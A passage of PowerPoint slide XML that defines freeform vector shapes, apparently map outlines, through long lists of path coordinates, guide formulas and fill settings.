                      <a:pt x="103" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="460" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="460" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="242"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36342" name="Freeform 74"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3819" y="2342"/>
                <a:ext cx="465" cy="474"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 373 w 465"/>
                  <a:gd name="T1" fmla="*/ 228 h 474"/>
                  <a:gd name="T2" fmla="*/ 375 w 465"/>
                  <a:gd name="T3" fmla="*/ 207 h 474"/>
                  <a:gd name="T4" fmla="*/ 354 w 465"/>
                  <a:gd name="T5" fmla="*/ 190 h 474"/>
                  <a:gd name="T6" fmla="*/ 337 w 465"/>
                  <a:gd name="T7" fmla="*/ 176 h 474"/>
                  <a:gd name="T8" fmla="*/ 321 w 465"/>
                  <a:gd name="T9" fmla="*/ 180 h 474"/>
                  <a:gd name="T10" fmla="*/ 319 w 465"/>
                  <a:gd name="T11" fmla="*/ 201 h 474"/>
                  <a:gd name="T12" fmla="*/ 332 w 465"/>
                  <a:gd name="T13" fmla="*/ 244 h 474"/>
                  <a:gd name="T14" fmla="*/ 324 w 465"/>
                  <a:gd name="T15" fmla="*/ 249 h 474"/>
                  <a:gd name="T16" fmla="*/ 304 w 465"/>
                  <a:gd name="T17" fmla="*/ 255 h 474"/>
                  <a:gd name="T18" fmla="*/ 295 w 465"/>
                  <a:gd name="T19" fmla="*/ 275 h 474"/>
                  <a:gd name="T20" fmla="*/ 264 w 465"/>
                  <a:gd name="T21" fmla="*/ 296 h 474"/>
                  <a:gd name="T22" fmla="*/ 227 w 465"/>
                  <a:gd name="T23" fmla="*/ 327 h 474"/>
                  <a:gd name="T24" fmla="*/ 207 w 465"/>
                  <a:gd name="T25" fmla="*/ 348 h 474"/>
                  <a:gd name="T26" fmla="*/ 192 w 465"/>
                  <a:gd name="T27" fmla="*/ 373 h 474"/>
                  <a:gd name="T28" fmla="*/ 186 w 465"/>
                  <a:gd name="T29" fmla="*/ 414 h 474"/>
                  <a:gd name="T30" fmla="*/ 175 w 465"/>
                  <a:gd name="T31" fmla="*/ 446 h 474"/>
                  <a:gd name="T32" fmla="*/ 160 w 465"/>
                  <a:gd name="T33" fmla="*/ 466 h 474"/>
                  <a:gd name="T34" fmla="*/ 147 w 465"/>
                  <a:gd name="T35" fmla="*/ 474 h 474"/>
                  <a:gd name="T36" fmla="*/ 110 w 465"/>
                  <a:gd name="T37" fmla="*/ 396 h 474"/>
                  <a:gd name="T38" fmla="*/ 76 w 465"/>
                  <a:gd name="T39" fmla="*/ 291 h 474"/>
                  <a:gd name="T40" fmla="*/ 74 w 465"/>
                  <a:gd name="T41" fmla="*/ 254 h 474"/>
                  <a:gd name="T42" fmla="*/ 67 w 465"/>
                  <a:gd name="T43" fmla="*/ 252 h 474"/>
                  <a:gd name="T44" fmla="*/ 38 w 465"/>
                  <a:gd name="T45" fmla="*/ 265 h 474"/>
                  <a:gd name="T46" fmla="*/ 30 w 465"/>
                  <a:gd name="T47" fmla="*/ 238 h 474"/>
                  <a:gd name="T48" fmla="*/ 17 w 465"/>
                  <a:gd name="T49" fmla="*/ 229 h 474"/>
                  <a:gd name="T50" fmla="*/ 11 w 465"/>
                  <a:gd name="T51" fmla="*/ 210 h 474"/>
                  <a:gd name="T52" fmla="*/ 38 w 465"/>
                  <a:gd name="T53" fmla="*/ 203 h 474"/>
                  <a:gd name="T54" fmla="*/ 43 w 465"/>
                  <a:gd name="T55" fmla="*/ 188 h 474"/>
                  <a:gd name="T56" fmla="*/ 30 w 465"/>
                  <a:gd name="T57" fmla="*/ 165 h 474"/>
                  <a:gd name="T58" fmla="*/ 36 w 465"/>
                  <a:gd name="T59" fmla="*/ 139 h 474"/>
                  <a:gd name="T60" fmla="*/ 61 w 465"/>
                  <a:gd name="T61" fmla="*/ 137 h 474"/>
                  <a:gd name="T62" fmla="*/ 91 w 465"/>
                  <a:gd name="T63" fmla="*/ 102 h 474"/>
                  <a:gd name="T64" fmla="*/ 111 w 465"/>
                  <a:gd name="T65" fmla="*/ 66 h 474"/>
                  <a:gd name="T66" fmla="*/ 100 w 465"/>
                  <a:gd name="T67" fmla="*/ 52 h 474"/>
                  <a:gd name="T68" fmla="*/ 98 w 465"/>
                  <a:gd name="T69" fmla="*/ 31 h 474"/>
                  <a:gd name="T70" fmla="*/ 94 w 465"/>
                  <a:gd name="T71" fmla="*/ 16 h 474"/>
                  <a:gd name="T72" fmla="*/ 134 w 465"/>
                  <a:gd name="T73" fmla="*/ 14 h 474"/>
                  <a:gd name="T74" fmla="*/ 152 w 465"/>
                  <a:gd name="T75" fmla="*/ 1 h 474"/>
                  <a:gd name="T76" fmla="*/ 168 w 465"/>
                  <a:gd name="T77" fmla="*/ 26 h 474"/>
                  <a:gd name="T78" fmla="*/ 181 w 465"/>
                  <a:gd name="T79" fmla="*/ 44 h 474"/>
                  <a:gd name="T80" fmla="*/ 165 w 465"/>
                  <a:gd name="T81" fmla="*/ 55 h 474"/>
                  <a:gd name="T82" fmla="*/ 175 w 465"/>
                  <a:gd name="T83" fmla="*/ 76 h 474"/>
                  <a:gd name="T84" fmla="*/ 206 w 465"/>
                  <a:gd name="T85" fmla="*/ 99 h 474"/>
                  <a:gd name="T86" fmla="*/ 191 w 465"/>
                  <a:gd name="T87" fmla="*/ 124 h 474"/>
                  <a:gd name="T88" fmla="*/ 229 w 465"/>
                  <a:gd name="T89" fmla="*/ 145 h 474"/>
                  <a:gd name="T90" fmla="*/ 251 w 465"/>
                  <a:gd name="T91" fmla="*/ 150 h 474"/>
                  <a:gd name="T92" fmla="*/ 275 w 465"/>
                  <a:gd name="T93" fmla="*/ 162 h 474"/>
                  <a:gd name="T94" fmla="*/ 301 w 465"/>
                  <a:gd name="T95" fmla="*/ 164 h 474"/>
                  <a:gd name="T96" fmla="*/ 317 w 465"/>
                  <a:gd name="T97" fmla="*/ 155 h 474"/>
                  <a:gd name="T98" fmla="*/ 328 w 465"/>
                  <a:gd name="T99" fmla="*/ 149 h 474"/>
                  <a:gd name="T100" fmla="*/ 349 w 465"/>
                  <a:gd name="T101" fmla="*/ 162 h 474"/>
                  <a:gd name="T102" fmla="*/ 380 w 465"/>
                  <a:gd name="T103" fmla="*/ 154 h 474"/>
                  <a:gd name="T104" fmla="*/ 386 w 465"/>
                  <a:gd name="T105" fmla="*/ 143 h 474"/>
                  <a:gd name="T106" fmla="*/ 423 w 465"/>
                  <a:gd name="T107" fmla="*/ 119 h 474"/>
                  <a:gd name="T108" fmla="*/ 447 w 465"/>
                  <a:gd name="T109" fmla="*/ 132 h 474"/>
                  <a:gd name="T110" fmla="*/ 459 w 465"/>
                  <a:gd name="T111" fmla="*/ 147 h 474"/>
                  <a:gd name="T112" fmla="*/ 430 w 465"/>
                  <a:gd name="T113" fmla="*/ 165 h 474"/>
                  <a:gd name="T114" fmla="*/ 414 w 465"/>
                  <a:gd name="T115" fmla="*/ 211 h 474"/>
                  <a:gd name="T116" fmla="*/ 398 w 465"/>
                  <a:gd name="T117" fmla="*/ 227 h 47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465"/>
                  <a:gd name="T178" fmla="*/ 0 h 474"/>
                  <a:gd name="T179" fmla="*/ 465 w 465"/>
                  <a:gd name="T180" fmla="*/ 474 h 47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465" h="474">
                    <a:moveTo>
                      <a:pt x="388" y="242"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="388" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
